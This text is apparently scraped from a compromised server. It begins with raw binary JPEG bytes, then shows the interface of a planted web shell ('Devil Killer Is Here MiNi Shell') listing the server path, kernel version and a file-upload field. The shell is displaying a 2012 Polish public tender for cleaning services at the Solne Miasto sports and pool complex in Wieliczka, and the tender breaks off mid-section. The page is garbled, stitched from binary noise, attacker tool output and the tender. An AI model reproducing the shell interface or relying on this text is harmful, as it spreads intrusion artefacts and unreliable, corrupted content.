JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121214/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121214/511690-N-2012.html

<p class="kh_header"><b>Wieliczka: Usługa sprzątania CER</b><br>
<b>Numer ogłoszenia: 511690 - 2012; data zamieszczenia: 14.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> SOLNE MIASTO  Sp. z o.o. , ul. Tadeusza Kościuszki 15, 32-020 Wieliczka, woj. małopolskie, tel. 12 357 32 64, faks 12 268 68 60.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa sprzątania CER.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest codzienne świadczenie specjalistycznych usług sprzątania Solne Miasto Sp z o. o . Wykazy pomieszczeń wraz z ich metrażem, zakresem czynności, harmonogramem ich wykonywania, procedurami czyszczenia niecki basenowej oraz wymaganiami dotyczącymi używanych środków chemicznych przedstawiono poniżej.
 Metraże powierzchni przeznaczonych do sprzątania:

I część basenowa:
1.	pomieszczenia szatniowe o powierzchni 176,62 m2
2.	korytarze, winda oraz klatki schodowe o powierzchni 258,41 m2
3.	pomieszczenia sanitarne o powierzchni 65,38 m2
4.	drzwi wewnętrzne oraz zewnętrzne, parapety wewnętrzne, winda, uchwyty, poręcze
5.	opróżnianie koszy na śmieci znajdujących się na terenie basenu
6.	uzupełnianie środków higienicznych w sanitariatach -papier toaletowy, mydło w płynie, ręczniki papierowe
7.	widownia o powierzchni 203,55 m2
8.	sauny o powierzchni 75,57 m2
9.	ściąganie wody z hali basenowej 1089,62 m2
10.	czyszczenie elementów metalowych balustrad, baterii zlewozmywakowych, baterii prysznicowych, luster, kratek wentylacyjnych, elementów drewnianych
11.	hala basenowa o powierzchni 1089,62 m2
12.	pomieszczenia administracyjne o powierzchni 170,9 m2
13.	punkt medyczny, pomieszczenia socjalne ratowników o powierzchni 40,28 m2
14.	magazyn basenu o powierzchni 8,5 m2
szyby i przeszklenia:
15.	zewnętrznych o pow. ok. 454 m2 
16.	wewnętrznych o wysokości przeszkleń do 2 m - o pow. ok. 148 m2  wewnętrznych o wysokości przeszkleń powyżej 2m - o pow. ok. 40 m2 
17.	Mycie niecki basenowej nastąpi 1 raz w trakcie przerwy technicznej.
18.	Mycie ścian hali basenowej o pow. ok. 325 m2 

Zamawiający zapewni Wykonawcy 2 pomieszczenia -1 magazyn o pow. 10 m2, 1 pomieszczenie socjalne o pow. 10m2 


II. Hala sportowa wraz z częścią administracyjną.
1.	 zespół toalet i sanitariatów o powierzchni 65,21m2 hala sportowa i 56m2 część administracyjna
2.	korytarze i klatki schodowe o powierzchni 192,82m2
3.	 hol wejściowy o powierzchni 110,8 m2
4.	 szatnie o powierzchni 166,72 m2
5.	 drzwi, parapety, balustrady, uchwyty i poręcze
6.	pomieszczenia administracji o powierzchni 50,52 m2
7.	pomieszczenie komentatorów o powierzchni 9,58 m2
8.	zaplecze socjalne o powierzchni 13,04 m2
9.	siłownia o powierzchni 124,62 m2
10.	widownia i kuluary o powierzchni 441,25 m2
11.	arena hali o powierzchni 1170,58 m2 
12.	Mycie szyb i przeszkleń powierzchnia około 13m2

III. Patio
1.	Wejście oraz dziedziniec  powierzchnia 934,02 m2 z kamienia 
2.	mycie szyb i przeszkleń 
3.	ściany osłonowej o powierzchni 146,64 m2
4.	szyb i przeszkleń fasady patio o powierzchni 146,54 m2 
5.	szyby i przeszklenia - prace na wysokości 1056 m2


IV. część edukacyjna, 
1.	recepcja 41,30m 2 powierzchni
2.	zespół toalet o powierzchni 63,04m2
3.	korytarze o powierzchni 179m2
4.	wiatrołap o powierzchni 6,61m2
5.	hol wejściowy o powierzchni 33,77m2
6.	biura o powierzchni 42m2
7.	sala audytoryjna o powierzchni 84,25m2
8.	sala audytoryjna o powierzchni 62,70m2
9.	sale dydaktyczne 5 segmentów po 60,5m razem 302,5m2
10.	uzupełnianie środków higienicznych w sanitariatach
11.	Mycie szyb i przeszkleń raz w tygodniu o powierzchni około 62,58m2


Ogólnie powierzchnie do czyszczenia:
1.	1170,58m2 - tarkett
2.	1560,71m2 - wykładzina podłogowa z winylu
3.	 495,48m2 - płytki  
4.	 szyby i przeszklenia o powierzchni około 368,7705m
5.	uzupełnianie środków higienicznych w sanitariatach	


II.	HARMONOGRAM CZYNNOŚCI:

1.	Basen Solne Miasto CER  jest czynny dla klientów przez 7 dni w tygodniu od 6:30 do 22:30, Hala sportowa i cześć dydaktyczne będzie czynna w godz. 7.00 do ok. 22.30 z wyłączeniem Świąt Bożego Narodzenia i Wielkanocy oraz 1 listopada i 1 stycznia. 
2.	W terminie wrzesień  2013 r. przewidywana jest przerwa technologiczna, w okresie której zintensyfikowane będą usługi sprzątania hal basenowych.
3.	Środki czystości -specjalistyczne, materiały eksploatacyjne -worki na śmieci, papier toaletowy, ręczniki papierowe, mydło w płynie, oraz urządzenia i przybory do sprzątania dostarczy Wykonawca. 
4.	Zamawiający wymaga aby wykonywanie przedmiotu zamówienia odbywało się w następujący sposób:
a)	 W drodze serwisu dziennego: wykonywanego w godzinach od 6.30 do 22.30 w części basenowej oraz w godzinach od 7.00 do ok. 23.00 w części hali sportowej poprzez prace porządkowo-czystościowe, których celem jest bieżące utrzymanie czystości szatni basenowych, sanitariatów  oraz holi w częstotliwości i szczegółowym zakresie opisanym w tabeli 
b)	W drodze sprzątania zasadniczego nocnego wykonywanego w godzinach od 23:30 do 5:30, poprzez prace porządkowo-czystościowe w częstotliwości i szczegółowym zakresie opisanym w tabeli 
5.	Wymagana minimalna obsada serwisów:

Od poniedziałku

do niedzieli	Ilość pracowników
	Część basenowa	Hala sportowa z zapleczem, część Edukacyjno-Konferencyjna
06:30 -  8:00	1 osoba	
08:00 - 22:30	2 osoby 	
07.00 - 23.00		1 osoba

6.	W miarę potrzeby, do zamawiającego należy decyzja o przesunięciu osób z części basenowej na część hali sportowej lub edukacyjnej.
7.	Osoba wyznaczona przez wykonawcę do wykonywania czynności sprzątających, ma obowiązek zgłoszenia swojej obecności osobie wskazanej przez zamawiającego.



   
III.	 SZCZEGÓŁOWY WYKAZ CZYNNOŚCI WRAZ Z ICH CZĘSTOTLIWOŚCIĄ:


L.p.	Rodzaj czynności	Serwis dzienny

Częstotliwość
w okresie objętym
zamówieniem	Zasadnicze sprzątanie
    nocne
Częstotliwość
w okresie objętym
zamówienie	
a	B	c	d	
1	Sprzątanie części basenowej	 		
 	1.	Sprzątanie widowni  		codziennie	
	1.1  czyszczenie schodów oraz korytarza	Na bieżąco	codziennie	
	1.2.	Mycie przeszkleń obustronne		codziennie	
	1.3	Czyszczenie siedzisk	Na bieżąco	codziennie	
	2.	mycie i dezynfekcja powierzchni plażowych wokół basenów		codziennie	
	3.	mycie i dezynfekcja ścian pokrytych flizami		codziennie	
	4.	sprzątanie i dezynfekcja niecek basenów o łącznej powierzchni 622 m2	1x przerwa techniczna		
	5.	mycie murków wokół basenów		codziennie	
	6.	zraszanie, przecieranie, odkurzanie roślinności		1 x  tydzień	
	7.	mycie dostępnych okien i przeszkleń hali basenowej -do wysokości 2.40 m 	Na bieżąco	codziennie	
	8.	czyszczenie siedzisk ratowników rozmieszczonych wokół basenów		codziennie 	
	9.	czyszczenie poręczy i barierek metalowych , balustrad		codziennie	
	10.	mycie i dezynfekcja stanowiska startowego oraz podestów przy zjeżdżalni, mostka		codziennie	
	11.	czyszczenie rynny zjazdowej od wewnątrz i zewnątrz  w zakresie dostępnym		codziennie	
	12.	czyszczenie rynny zjazdowej od wewnątrz i zewnątrz  w pełnym zakresie	1x przerwa techniczna		
	13.	mycie parapetów		codziennie	
	14.	Czyszczenie kratek przelewowych na hali basenowej		1x tydzień	
	15.	Czyszczenie fug. 		1 x tydzień	
	16.	Mycie szyb i przeszkleń hali basenowej do pełnej wysokości		1 x rok	
2	Sprzątanie pomieszczeń szatni, pryszniców oraz sanitariatów przy hali basenowej			
 	1. Zapewnienie bieżącego zbierania wody we wszystkich pomieszczeniach natrysków, WC i w szatniach. Mycie podłóg. 
Nieczystości stałe ze ściągaczy bezwzględnie muszą być wyrzucane do koszy, a nie zagarniane do kratek ściekowych	Na bieżąco 		
	2. Mycie i dezynfekcja urządzeń sanitarnych -umywalki, baterie, kabiny natryskowe, miski klozetowe, pisuary, itp.	Na bieżąco	codziennie	
	3. Mycie i dezynfekcja szafek ubraniowych	-	codziennie	
	4. Ściąganie kurzy z szafek ubraniowych 	-	codziennie	
	5. Mycie i dezynfekcja powierzchni podłóg i ścian pokrytych płytkami ceramicznymi	-	codziennie	
	6. Opróżnianie koszy i wymiana wkładów foliowych	Na bieżąco		
	7. Mycie i dezynfekcja koszy na śmieci z zewnątrz i od wewnątrz	-	codziennie	
	8. Mycie i dezynfekcja podajników na mydło i papier toaletowy z zewnątrz	-	codziennie 	
	9. Mycie luster	Na bieżąco	codziennie	
	10. Mycie i dezynfekcja ścian w przebieralni i szatni pokrytych flizami	-	codziennie	
	11. Mycie i dezynfekcja kabin przebieralni	-	codziennie	
	12. Odkurzanie, mycie i dezynfekcja suszarek do włosów w holach 	-	codziennie	
	13. Przecieranie i dezynfekcja ławek w holu szatniowym szatniowych  i w pomieszczeniu z suszarkami	-	codziennie	
	14. Mycie i dezynfekcja ścianek w toaletach przy prysznicach	-	codziennie 	
	15. Odkurzanie i dezynfekcja miejsc wlotów do wentylacji wyciągowej	-	1x /tydzień	
	16.Mycie ścian do wysokości 2m		1x tydzień	
	17.	Czyszczenie fug		1x tydzień	
3	Sprzątanie pomieszczeń sauny 	 		
	1.Zapewnienie bieżącego zbierania wody oraz bieżące usuwanie części stałych przy kratkach ściekowych w pomieszczeniach sauny, natrysków, WC. Nieczystości stałe ze ściągaczy bezwzględnie muszą być wyrzucane do koszy, a nie zagarniane do kratek ściekowych	Na bieżąco		
	2. Mycie i dezynfekcja siedzisk		codziennie	
	3. Mycie i dezynfekcja podłóg, ścian i sufitów w saunach 	-	codziennie	
	4. Mycie i dezynfekcja drzwi szklanych oraz beczki do schładzania ciała	-	codziennie	
	5. Mycie i dezynfekcja toalet i umywalek	Na bieżąco	codziennie	
	6. Mycie i dezynfekcja natrysków przy saunach	-	codziennie	
	7. Mycie całości posadzek w saunach	-	codziennie	
	8. Mycie i dezynfekcja wnęk pryszniców	-	codziennie	
	9. Mycie i dezynfekcja leżaków i innego sprzętu stanowiącego wyposażenie sauny	-	codziennie	
	10. Czyszczenie fug	-	codziennie	
4	Pomieszczenia ratowników 	 		
 	1. Mycie posadzek w pomieszczeniach ratowników   	-	codziennie	
	2. Mycie i dezynfekcja pomieszczeń sanitariatów wraz z wyposażeniem 	 Na bieżąco
	codziennie	
	3. Mycie szafek z zewnątrz w pomieszczeniach ratowników  	-	codziennie	
	4. Opróżnianie koszy na śmieci oraz wymiana worków  	-	codziennie	
	5. Mycie przeszkleń miedzy halą basenową a pomieszczeniami ratowników i instruktorów 	-	codziennie	
	6.Mycie i dezynfekcja przebieralni   
  	-	codziennie	
	7.Mycie okien 
		1x miesiąc	
	8.Mycie drzwi		codziennie	
5	Sprzątanie siłowni			
	1. Mycie podłóg, wykładzin,	Na bieżąco		
	2. Mycie, dezynfekcja i odkurzanie urządzeń siłowych oraz drabinek		codziennie	
	3. Opróżnianie i mycie koszy na śmieci, wymiana wkładów foliowych		codzienni	
	4. Mycie luster i przeszkleń,   mycie biurek, drzwi, mebli		codziennie	
	5. Mycie i dezynfekcja siedzisk 		codziennie	
  6	Sprzątanie pomieszczeń biurowych			
	1.Odkurzanie powierzchni dywanowych		codziennie	
	2. Czyszczenie parapetów, mycie biurek, drzwi, mebli		codziennie	
	3. Odkurzanie sprzętu biurowego -komputery, aparaty telefoniczne, drukarki		codziennie	
	4. Opróżnianie i mycie koszy na śmieci, wymiana wkładów foliowych		codziennie	
	5. Opróżnianie i odkurzanie niszczarki		codziennie	
	6. Mycie okien, grzejników c.o.	-	1x w miesiącu	
	7.Mycie podłogi oraz przeszkleń w pomieszczeniu komentatora 
		codziennie	
7	Sprzątanie powierzchni ogólnych	 		
	1. Mycie holi 	Na bieżąco	codziennie	
	2. Mycie głównych klatek schodowych i korytarzy	Na bieżąco
	codziennie	
 	3. Odkurzanie wykładzin dywanowych, mat wejściowych	Na bieżąco
	codziennie	
	4. Wycieranie na wilgotno lub mycie drzwi 	-	codziennie	
	5. Opróżnianie koszy i wymiana wkładów foliowych	-	codziennie	
	6. Mycie i dezynfekcja koszy na śmieci z zewnątrz i od wewnątrz	-	codziennie	
	7. Mycie i przecieranie dostępnych przeszkleń wejść z zewnątrz i od wewnątrz do wysokości 2,40 m	-	codziennie	
	8. Mycie i przecieranie dostępnych przeszkleń holi z zewnątrz i od wewnątrz do wysokości 2,40 m	- 	codziennie	
	9. Mycie dostępnych przeszkleń hali basenowej od strony holu głównego- do wysokości 2,40 m	-	codziennie	
	10. Mycie i przecieranie przeszkleń schodów holi i balustrad  dwustronnie 	-	2 x na tydzień	
	11. Czyszczenie barierek i poręczy wewnątrz budynku 	- 	codziennie	
	12. Utrzymanie w czystości windy osobowej wewnątrz wraz ze stalowymi elementami przy drzwiach          a także przeszkleń windy		codziennie	
	13. Mycie i dezynfekcja łazienek i sanitariatów	Na bieżąco
	codziennie	
	14. Mycie pomieszczeń kas	Na bieżąco
	codziennie	
	18.	Czyszczenie bramek wyjściowych wykonanych ze stali	-	codziennie	
	19.	Sprzątanie terenu przed budynkiem ;opróżnianie koszy na śmieci	Na bieżąco		
	20.	Mycie szyb i przeszkleń windy do pełnej wysokości		1 x rok	
	21.	Przecieranie zabrudzeń ze ścian do wysokości 2 m		1x tydzień	
8	Sprzątanie hali sportowej	 		

 	1.	Mycie holi 	Na bieżąco	codziennie	
	2.	Mycie głównych klatek schodowych i korytarzy	Na bieżąco
	codziennie	
	3.	Odkurzanie wykładzin dywanowych, mat wejściowych	Na bieżąco
	codziennie	
	4.	Wycieranie na wilgotno lub mycie drzwi 	-	codziennie	nnie

	5.	Opróżnianie koszy i wymiana wkładów foliowych	-	codziennie	
	6.	Mycie i dezynfekcja koszy na śmieci z zewnątrz i od wewnątrz	-	codziennie	
	
Mycie i przecieranie dostępnych przeszkleń wejść z zewnątrz i od wewnątrz do wyokości 2,40 m
7.			
codziennie	
	8.	Mycie i przecieranie dostępnych przeszkleń holi z zewnątrz i od wewnątrz do wysokości 2,40 m	- 	codziennie	
	9.	Mycie areny hali 	-	codziennie	
	10.	Czyszczenie wykładziny rozkładanej na hali w czasie imprez 	Na bieżąco		
	11.	Mycie i przecieranie przeszkleń schodów holi i balustrad  dwustronnie 	-	2 x na tydzień	
	12.	Czyszczenie barierek, poręczy i parapetów wewnątrz budynku 	- 	codziennie	
	13.	Sprzątanie widowni  	Na bieżąco	codziennie	
	           13.1   czyszczenie schodów oraz korytarza
	codziennie	
	13.2   Mycie przeszkleń		codziennie	
	13.3	Czyszczenie siedzisk	Na bieżąco	codziennie	
	14.	Mycie i dezynfekcja łazienek i sanitariatów	Na bieżąco	codziennie	ie

	15.	Mycie i dezynfekcja pomieszczeń szatni oraz pryszniców przy hali sportowej	Na bieżąco	codziennie	
	15.1 1. Zapewnienie bieżącego zbierania wody we wszystkich pomieszczeniach natrysków, WC i w szatniach.  Nieczystości stałe ze ściągaczy bezwzględnie muszą być wyrzucane do koszy, a nie zagarniane do kratek ściekowych
	Na bieżąco	codziennie	
	15.2 Mycie i dezynfekcja urządzeń sanitarnych -umywalki, baterie, kabiny natryskowe, miski klozetowe, pisuary, itp.
	Na bieżąco	codziennie	
	15.3 Mycie i dezynfekcja szafek ubraniowych
		codziennie	
	15.4. Ściąganie kurzy z szafek ubraniowych
		codziennie	
	15.5 Mycie i dezynfekcja powierzchni podłóg i ścian pokrytych płytkami ceramicznymi
		codziennie	
	15.6 Opróżnianie koszy i wymiana wkładów foliowych
	Na bieżąco	codziennie	
	15.7 Mycie i dezynfekcja koszy na śmieci z zewnątrz i od wewnątrz
		codz
ennie	
	15.8 Mycie i dezynfekcja podajników na mydło i papier toaletowy z zewnątrz
		codziennie	
	15.9 Mycie luster
	Na bieżąco	codziennie	
	16.	Mycie pomieszczeń kas		codziennie	
	17.	Mycie pomieszczenie monitoringu	-	1x tydzień	
	18.Przecieranie zabrudzeń ze ścian do wysokości 2 m		1x tydzień	
9	Sprzątanie patio			

 	1. Mycie dziedzińca	Na bieżąco	codziennie	
	3. Odkurzanie wykładzin dywanowych, mat wejściowych	Na bieżąco
	codziennie	
	4. Wycieranie na wilgotno lub mycie drzwi 	-	codziennie	
	5. Opróżnianie koszy i wymiana wkładów foliowych	-	codziennie	
	6. Mycie i dezynfekcja koszy na śmieci z zewnątrz i od wewnątrz	-	codziennie	
	7. Mycie i przecieranie dostępnych przeszkleń wejść z zewnątrz i od wewnątrz do wysokości 2,40 m	
 -
	codziennie	
	8. Mycie i przecieranie dostępnych przeszkleń holi z zewnątrz i od wewnątrz do wysokości 2,40 m	- 	codziennie	
	9. Mycie dostępnych przeszkleń hali basenowej od strony holu głównego i sali wielofunkcyjnej- do wysokości 2,40 m	-	codziennie	
	10. Mycie i przecieranie przeszkleń schodów holi i balustrad  dwustronnie 	-	2 x na tydzień	
	12.Czyszczenie barierek, poręczy i parapetów 
	- 	codziennie	
	13.	Mycie szyb i przeszkleń do pełnej wysokości dziedzińca 		1 x rok	
	14.	Czyszczenie sprzętu na patio (stoły do tenisa, piłkarzów; stojaki reklamowe itp.)		codziennie	
10	Sprzątanie części edukacyjnej	 		

 	1. Mycie holi, szatni		codziennie	
	2. Mycie głównych klatek schodowych i korytarzy		codziennie	
	3. Odkurzanie wykładzin dywanowych, mat wejściowych	Na bieżąco	codziennie	
	4. Wycieranie na wilgotno lub mycie drzwi 	-	codziennie	
	5. Opróżnianie koszy i wymiana wkładów foliowych	-	codziennie	
	6. Mycie i dezynfekcja koszy na śmieci z zewnątrz i od wewnątrz	-	codziennie	
	7. Mycie i przecieranie dostępnych przeszkleń wejść z zewnątrz i od wewnątrz do wysokości 2,40 m	-	codziennie	
	8. Mycie i przecieranie dostępnych przeszkleń holi z zewnątrz i od wewnątrz do wysokości 2,40 m	- 	codziennie	
	9. Mycie okien, grzejników c.o.	-	1x miesiąc	
	10. Mycie i przecieranie przeszkleń schodów holi i balustrad  dwustronnie 	-	2 x na tydzień	
	11. Czyszczenie barierek, poręczy i parapetów wewnątrz budynku 	- 	codziennie	
	13. Mycie sal dydaktycznych, podłóg, mebli, siedzisk, sprzętu  		codziennie	
	14. Mycie i dezynfekcja łazienek i sanitariatów	Na bieżąco
	codziennie	
	15. Mycie pomieszczeń kas	-	codziennie	
	16. Czyszczenie bramek wyjściowych wykonanych ze stali
	-	co
ziennie	
	17Mycie i dezynfekcja pomieszczenia przeznaczonego do zabawy dla dzieci, odkurzanie, mycie przeszkleń.
	Na bieżąco	codziennie	
	18.Czyszczenie zabawek dla dzieci w konstrukcji zabawowej. 		2x miesiąc	
11	Czyszczenie fug w pomieszczeniach pokrytych płytkami na podłogach i na ścianach oraz w narożnikach tych pomieszczeń i w miejscach trudnodostępnych		
codziennie	
12

	Dezynfekcja hali basenowej oraz pomieszczeń szatni damskiej i męskiej oraz sanitariatów w szatniach hali basenowej i hali sportowej.
		codziennie


IV.	Wykonawca odpowiada za spowodowane przez niego i jego pracowników zanieczyszczanie wody basenu oraz pozostawianie innych zanieczyszczeń - we wzorze umowy określone zostały kary umowne określone dla Wykonawcy, który w szczególności zanieczyścił wodę i nieckę basenu oraz który niewłaściwie wykonał usługi czyszczenia.

Wykonawca wyposaży swoich pracowników w jednolite, estetyczne ubrania z nazwą Firmy i identyfikatorem pracownika.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1 Wykonawca musi wykazać wykonanie (zakończenie) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej usługi polegającej na sprzątaniu i dezynfekcji pomieszczeń, odpowiadających swoim rodzajem  przedmiotowi niniejszego zamówienia, tj. obiektu sportowego z niecką basenową o wartości min. 100 000 zł brutto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazu narzędzi, dostępnych wykonawcy usług  w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami zgodnie z Załącznikiem nr 8 do Nin. SIWZ w zakresie opisanym w pkt. 5.1 nin SIWZ . Warunek zostanie spełniony poprzez udokumentowanie posiadania min. szorowarki jednotarczowej - 2 sztuki, myjki ciśnieniowej - 2 sztuki, maszyny czyszcząco-zbierającej o wydajności co najmniej 600 m2 na godzinę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi przedstawić dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności w wysokości min. 200 000 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
